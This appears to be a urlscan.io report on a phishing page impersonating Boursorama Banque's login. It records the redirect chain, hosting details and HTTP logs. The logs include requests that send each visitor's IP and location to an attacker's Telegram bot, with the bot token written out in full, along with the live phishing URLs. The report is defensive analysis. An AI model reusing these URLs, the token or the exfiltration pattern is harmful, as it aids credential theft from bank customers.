fr-boursorma.web.app Open in urlscan Pro
2620:0:890::100 Malicious Activity! Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://uptime.agencek2.com/
Effective URL:
https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
Submission: On June 22 via manual (June 22nd 2023, 5:39:39 pm UTC) from FR — Scanned from FR

Summary HTTP 28 Redirects Behaviour Indicators

Summary

This website contacted 5 IPs in 4 countries across 6 domains to perform 28 HTTP transactions. The main IP is 2620:0:890::100, located in United States and belongs to FASTLY, US. The main domain is fr-boursorma.web.app.
TLS certificate: Issued by GTS CA 1D4 on May 10th 2023. Valid for: 3 months.

This is the only time fr-boursorma.web.app was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: Boursorama (Banking)

Domain & IP information

	IP Address	AS Autonomous System
1	5.39.68.33 5.39.68.33	16276 (OVH) (OVH)
3	192.99.71.107 192.99.71.107	16276 (OVH) (OVH)
2	2001:67c:4e8:... 2001:67c:4e8:f004::9	62041 (TELEGRAM) (TELEGRAM)
1 1	2606:4700:10:... 2606:4700:10::6814:8b41	13335 (CLOUDFLAR...) (CLOUDFLARENET)
18	2620:0:890::100 2620:0:890::100	54113 (FASTLY) (FASTLY)
4	2606:4700:e6:... 2606:4700:e6::ac40:cb1c	13335 (CLOUDFLAR...) (CLOUDFLARENET)
28	5

1 5.39.68.33 (France)

ASN16276 (OVH, FR)
PTR: mail2.agencek2.com

uptime.agencek2.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

3 192.99.71.107 (Montreal, Canada)

ASN16276 (OVH, FR)
PTR: 107.ip-192-99-71.net

ip-api.io	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2001:67c:4e8:f004::9 (Amsterdam, Netherlands)

ASN62041 (TELEGRAM, VG)

api.telegram.org	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2606:4700:10::6814:8b41 (United States) 1 redirects

ASN13335 (CLOUDFLARENET, US)

tinyurl.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

18 2620:0:890::100 (United States)

ASN54113 (FASTLY, US)

linkbs.web.app	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
fr-boursorma.web.app	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 2606:4700:e6::ac40:cb1c (United States)

ASN13335 (CLOUDFLARENET, US)

ka-f.fontawesome.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
18	web.app linkbs.web.app fr-boursorma.web.app	303 KB
4	fontawesome.com ka-f.fontawesome.com — Cisco Umbrella Rank: 4145	30 KB
3	ip-api.io ip-api.io — Cisco Umbrella Rank: 378193	3 KB
2	telegram.org api.telegram.org — Cisco Umbrella Rank: 35240	1 KB
1	tinyurl.com 1 redirects tinyurl.com — Cisco Umbrella Rank: 17588	517 B
1	agencek2.com uptime.agencek2.com	12 KB
28	6

	Domain	Requested by
17	fr-boursorma.web.app	fr-boursorma.web.app
4	ka-f.fontawesome.com	fr-boursorma.web.app
3	ip-api.io	uptime.agencek2.com fr-boursorma.web.app
2	api.telegram.org	uptime.agencek2.com fr-boursorma.web.app
1	linkbs.web.app	uptime.agencek2.com
1	tinyurl.com	1 redirects
1	uptime.agencek2.com
28	7

This site contains no links.

Subject Issuer	Validity	Valid
ip-api.io R3	`2023-06-11` - `2023-09-09`	3 months	crt.sh
api.telegram.org Go Daddy Secure Certificate Authority - G2	`2023-03-26` - `2024-04-26`	a year	crt.sh
web.app GTS CA 1D4	`2023-05-10` - `2023-08-08`	3 months	crt.sh
sni.cloudflaressl.com Cloudflare Inc ECC CA-3	`2022-08-12` - `2023-08-12`	a year	crt.sh

This page contains 1 frames:

Primary Page: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
Frame ID: 0555F27C73D478576184C70D89FF564C
Requests: 28 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page Title

Espace ClientLogo Boursorama Banque

Page URL History Show full URLs

http://uptime.agencek2.com/ Page URL
https://tinyurl.com/5dwkdzkx HTTP 301
https://linkbs.web.app/ Page URL
https://fr-boursorma.web.app/ Page URL
https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073 Page URL

Detected technologies

Font Awesome (Font Scripts) Expand

Overall confidence: 100%
Detected patterns

(?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:.*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)

jQuery (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

jquery[.-]([\d.]*\d)[^/]*\.js
jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

28
Requests

96 %
HTTPS

67 %
IPv6

6
Domains

7
Subdomains

5
IPs

4
Countries

349 kB
Transfer

2241 kB
Size

0
Cookies

0 Outgoing links

These are links going to different origins than the main page.

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://uptime.agencek2.com/ Page URL
https://tinyurl.com/5dwkdzkx HTTP 301
https://linkbs.web.app/ Page URL
https://fr-boursorma.web.app/ Page URL
https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073 Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 3

https://tinyurl.com/5dwkdzkx HTTP 301
https://linkbs.web.app/

28 HTTP transactions
0 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H/1.1 200
OK / Show response
uptime.agencek2.com/ 12 KB
12 KB 81ms
19ms Document
text/html 5.39.68.33
OVH

General

Check archive.org

Show headers Download Go to

Full URL: http://uptime.agencek2.com/
Protocol: HTTP/1.1
Server: 5.39.68.33 , France, ASN16276 (OVH, FR),
Reverse DNS: mail2.agencek2.com
Software: nginx / PleskLin
Resource Hash: 44513c21e67e9a8f7bd83cef23d4fb2791ac144b0d23b4e7dfccde8c2cff550e

Request headers

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36
accept-language: fr-FR,fr;q=0.9

Response headers

Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 12097
Content-Type: text/html
Date: Thu, 22 Jun 2023 17:39:34 GMT
ETag: "64946fe5-2f41"
Last-Modified: Thu, 22 Jun 2023 15:59:33 GMT
Server: nginx
X-Powered-By: PleskLin

GET
H/1.1 200
OK / Show response
ip-api.io/json/ 506 B
947 B 303ms
94ms XHR
application/json 192.99.71.107
OVH

General

Check archive.org

Show headers Download Go to

Full URL: https://ip-api.io/json/
Requested by: Host: uptime.agencek2.com
URL: http://uptime.agencek2.com/
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_128_GCM
Server: 192.99.71.107 Montreal, Canada, ASN16276 (OVH, FR),
Reverse DNS: 107.ip-192-99-71.net
Software: nginx/1.12.2 /
Resource Hash: 16e27340801dd77e3244701271c8d033ab71577d5640ee899403feda0831cff4

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: http://uptime.agencek2.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

Date: Thu, 22 Jun 2023 17:39:34 GMT
Server: nginx/1.12.2
x-ratelimit-remaining: 184
Content-Type: application/json; charset=utf-8
access-control-allow-origin: *
access-control-expose-headers
cache-control: max-age=0, private, must-revalidate
access-control-allow-credentials: true
x-ratelimit-reset: 22825
x-ratelimit-limit: 200
Connection: keep-alive
Content-Length: 506
x-request-id: F2sL56IfIUBEK12GsCIB

POST
H2 200 sendMessage
api.telegram.org/bot6000622365:AAGdwlfxz7iRPNdGcW7QH6KNxr7DoolITGc/ 386 B
634 B 143ms
75ms XHR
application/json 2001:67c:4e8:f004::9
TELEGRAM

General

Check archive.org

Show headers Download Go to

Full URL

https://api.telegram.org/bot6000622365:AAGdwlfxz7iRPNdGcW7QH6KNxr7DoolITGc/sendMessage?chat_id=891906517&text=IP%20address%20lein1%3A%2037.59.164.106%0Acity%3A%20%0Aregion%20name%3A%20%0Acountry%3A%20FR%0Ainternet%3A%20OVH%20SAS%0Azone%3A%20Europe%2FParis

Requested by

Host: uptime.agencek2.com
URL: http://uptime.agencek2.com/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (TELEGRAM, VG),

Reverse DNS

Software

nginx/1.18.0 /

Resource Hash

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: http://uptime.agencek2.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:35 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: nginx/1.18.0
access-control-allow-methods: GET, POST, OPTIONS
content-type: application/json
access-control-allow-origin: *
access-control-expose-headers: Content-Length,Content-Type,Date,Server,Connection
content-length: 386

GET
H2

200

/ Show response
linkbs.web.app/
Redirect Chain

https://tinyurl.com/5dwkdzkx
https://linkbs.web.app/

216 B
483 B

66ms
21ms

Document
text/html

2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://linkbs.web.app/

Requested by

Host: uptime.agencek2.com
URL: http://uptime.agencek2.com/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

6353529cb52f508fa199986854638d4dbf4648ee6ccbe9c7f4ec0fa7648e1e4b

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: http://uptime.agencek2.com/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36
accept-language: fr-FR,fr;q=0.9

Response headers

accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
cache-control: max-age=3600
content-encoding: br
content-length: 113
content-type: text/html; charset=utf-8
date: Thu, 22 Jun 2023 17:39:35 GMT
etag: "09845670f3f612ae80d74d91332b03e485e3bd13a72af8eeb109e5d619fd7040-br"
last-modified: Tue, 20 Jun 2023 12:02:02 GMT
strict-transport-security: max-age=31556926; includeSubDomains; preload
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
x-cache-hits: 1
x-served-by: cache-lcy-eglc8600054-LCY
x-timer: S1687455576.655701,VS0,VE3

Redirect headers

alt-svc: h3=":443"; ma=86400
cache-control: max-age=0, public, s-max-age=900, stale-if-error: 86400
cf-cache-status: DYNAMIC
cf-ray: 7db645807a3b2a49-CDG
content-type: text/html; charset=UTF-8
date: Thu, 22 Jun 2023 17:39:35 GMT
location: https://linkbs.web.app
referrer-policy: unsafe-url
server: cloudflare
x-content-type-options: nosniff
x-tinyurl-redirect: eyJpdiI6IndnYmR5ZjdUcmM0WVJ1NitBY094d3c9PSIsInZhbHVlIjoieGZ1OHdEaVVkbm1XTExKaStRNHBhanBYa0VmY0JCbTVucUxsUzMrbUtUenRYOWFYWU5VSERHQ0E0b2N6dkIraFY3T2pUTVJpMHVMNXYvQkdBRDBTa3c9PSIsIm1hYyI6IjE1YWJlNjJiODIyMDJlYWFmMDhkMzlkYTA3ZWI4MzYwYTMzMDg1ODZlY2M1YmQyMmQ0MTg5MTQ2MTU2MWM1YjgiLCJ0YWciOiIifQ==
x-xss-protection: 1; mode=block

GET
H2 200 / Show response
fr-boursorma.web.app/ 12 KB
2 KB 20ms
19ms Document
text/html 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

44ef903034ddcc9675dca414031a77ad129dd3555c58305816cb574ac106c132

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://linkbs.web.app/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36
accept-language: fr-FR,fr;q=0.9

Response headers

accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
cache-control: max-age=3600
content-encoding: br
content-length: 2210
content-type: text/html; charset=utf-8
date: Thu, 22 Jun 2023 17:39:35 GMT
etag: "4f5fc6c12e7387bb2cc157f2a54820c5313d617523814ec9d30dd3ab752caa5c-br"
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
strict-transport-security: max-age=31556926; includeSubDomains; preload
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
x-cache-hits: 1
x-served-by: cache-lcy-eglc8600054-LCY
x-timer: S1687455576.697743,VS0,VE1

GET
H/1.1 200
OK / Show response
ip-api.io/json/ 506 B
947 B 93ms
93ms XHR
application/json 192.99.71.107
OVH

General

Check archive.org

Show headers Download Go to

Full URL: https://ip-api.io/json/
Requested by: Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_128_GCM
Server: 192.99.71.107 Montreal, Canada, ASN16276 (OVH, FR),
Reverse DNS: 107.ip-192-99-71.net
Software: nginx/1.12.2 /
Resource Hash: 16e27340801dd77e3244701271c8d033ab71577d5640ee899403feda0831cff4

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

Date: Thu, 22 Jun 2023 17:39:35 GMT
Server: nginx/1.12.2
x-ratelimit-remaining: 170
Content-Type: application/json; charset=utf-8
access-control-allow-origin: *
access-control-expose-headers
cache-control: max-age=0, private, must-revalidate
access-control-allow-credentials: true
x-ratelimit-reset: 22824
x-ratelimit-limit: 200
Connection: keep-alive
Content-Length: 506
x-request-id: F2sL59eaqVJny8VX6fFi

POST
H2 200 sendMessage
api.telegram.org/bot6000622365:AAGdwlfxz7iRPNdGcW7QH6KNxr7DoolITGc/ 386 B
633 B 161ms
161ms XHR
application/json 2001:67c:4e8:f004::9
TELEGRAM

General

Check archive.org

Show headers Download Go to

Full URL

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (TELEGRAM, VG),

Reverse DNS

Software

nginx/1.18.0 /

Resource Hash

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

date: Thu, 22 Jun 2023 17:39:35 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: nginx/1.18.0
access-control-allow-methods: GET, POST, OPTIONS
content-type: application/json
access-control-allow-origin: *
access-control-expose-headers: Content-Length,Content-Type,Date,Server,Connection
content-length: 386

GET
H2 200 Primary Request login.html Show response
fr-boursorma.web.app/ 216 KB
29 KB 20ms
19ms Document
text/html 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

e59ae361b957e6ca1b5b64c375668f8c404c7de97ff9d7ef56229222d5654d99

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

Referer: https://fr-boursorma.web.app/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36
accept-language: fr-FR,fr;q=0.9

Response headers

accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
cache-control: max-age=3600
content-encoding: br
content-length: 29235
content-type: text/html; charset=utf-8
date: Thu, 22 Jun 2023 17:39:35 GMT
etag: "a76e98e5fd06b64f07bad74cbdc1fe1bc87cd785691f201f9b93817047f1108c-br"
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
strict-transport-security: max-age=31556926; includeSubDomains; preload
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
x-cache-hits: 1
x-served-by: cache-lcy-eglc8600054-LCY
x-timer: S1687455576.984699,VS0,VE2

GET
H3 200 1.css
fr-boursorma.web.app/css/ 181 KB
21 KB 22ms
21ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/1.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

611282d72af9f414bbc1272c919a1336265f4dbd6f2cf78f25d70bf09d1b8b8c

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.022546,VS0,VE2
etag: "64a62a3974456207d07a9d7324fefb5393e0f863096ac2a6f7b7321ad02cb7f6-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 20901
x-cache-hits: 1

GET
H3 200 2.css
fr-boursorma.web.app/css/ 595 KB
30 KB 39ms
38ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/2.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

d739b310b8a43bf4cda5f110d77bdfefa2123a890e1442b0270e0898f6b7f44e

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.022952,VS0,VE7
etag: "f697629ea3f740964724d8209766a2ece6d4fe8684563d4b9a250de35dd67b30-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 30198
x-cache-hits: 1

GET
H3 200 3.css
fr-boursorma.web.app/css/ 142 KB
18 KB 26ms
25ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/3.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

1b4b9bc613a34d05328e493db7c257ded1560681a47f2f0e7a32d95ad8d4c47b

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.023726,VS0,VE5
etag: "52a34fefa1b4d4d7a89041e22af547d1f281fe45733cc3967e8b0dcef7f9d334-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 18037
x-cache-hits: 1

GET
H3 200 4.css
fr-boursorma.web.app/css/ 196 KB
21 KB 23ms
22ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/4.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

698d247b4a8020859cb7d1ba6f1da9d345e89a619a0a890e56b69ae0d0a9015c

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.023431,VS0,VE3
etag: "7ca67671e00faa947ee97e40d3ada653ef7fa16ddeaca6632e418715a3913286-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 20751
x-cache-hits: 1

GET
H3 200 5.css
fr-boursorma.web.app/css/ 35 KB
6 KB 41ms
40ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/5.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

1d08e5a091a415aaeb621a8c6409054d0d67656553375fd27a3f2da779651097

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.025646,VS0,VE5
etag: "22d39e8f1917b2f0c235a2b3a5b042de932c4342ffcc090d66a182a8b332a19d-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 5422
x-cache-hits: 1

GET
H3 200 6.css
fr-boursorma.web.app/css/ 129 KB
12 KB 42ms
40ms Stylesheet
text/css 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/css/6.css

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

e9a3ed3097af3491b7582893352df85155f41076c7b994d9e93f76d446793c2d

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.029627,VS0,VE2
etag: "a6f7bbcb0298543410efb64c284a8734b17271fd2938936ff252a4dfeb6301e6-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/css; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 12176
x-cache-hits: 1

GET
H3 200 363d4a4d7b.js Show response
fr-boursorma.web.app/js/ 11 KB
4 KB 43ms
41ms Script
text/javascript 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/js/363d4a4d7b.js

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

112ac2e3ffe928e7a1dca786498b893f07d5b4f59153b7c43d74e2d9315bdf24

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
date: Thu, 22 Jun 2023 17:39:36 GMT
last-modified: Tue, 20 Jun 2023 11:56:42 GMT
x-timer: S1687455576.029368,VS0,VE2
etag: "765db67e9808c8652d1b492185077702f3738c2bba29f1bbbca139401d17e8dd-br"
vary: x-fh-requested-host, accept-encoding
x-cache: HIT
content-type: text/javascript; charset=utf-8
cache-control: max-age=3600
accept-ranges: bytes
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 3758
x-cache-hits: 1

GET
H3 200 jquery-1.11.0.js Show response
fr-boursorma.web.app/js/ 276 KB
69 KB 43ms
42ms Script
text/javascript 2620:0:890::100
FASTLY

General

Check archive.org

Show headers Download Go to

Full URL

https://fr-boursorma.web.app/js/jquery-1.11.0.js

Requested by

Host: fr-boursorma.web.app
URL: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073

Protocol

Security

QUIC, , AES_128_GCM

Server

2620:0:890::100 , United States, ASN54113 (FASTLY, US),

Reverse DNS

Software

Resource Hash

ce0343e1d6f489768eeefe022c12181c6a0822e756239851310acf076d23d10c

Security Headers

Name	Value
Strict-Transport-Security	max-age=31556926; includeSubDomains; preload

Request headers

accept-language: fr-FR,fr;q=0.9
Referer: https://fr-boursorma.web.app/login.html?xml_id=/fr_FR/Login?ID=972911073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.133 Safari/537.36

Response headers

x-served-by: cache-lcy-eglc8600050-LCY
strict-transport-security: max-age=31556926; includeSubDomains; preload
content-encoding: br
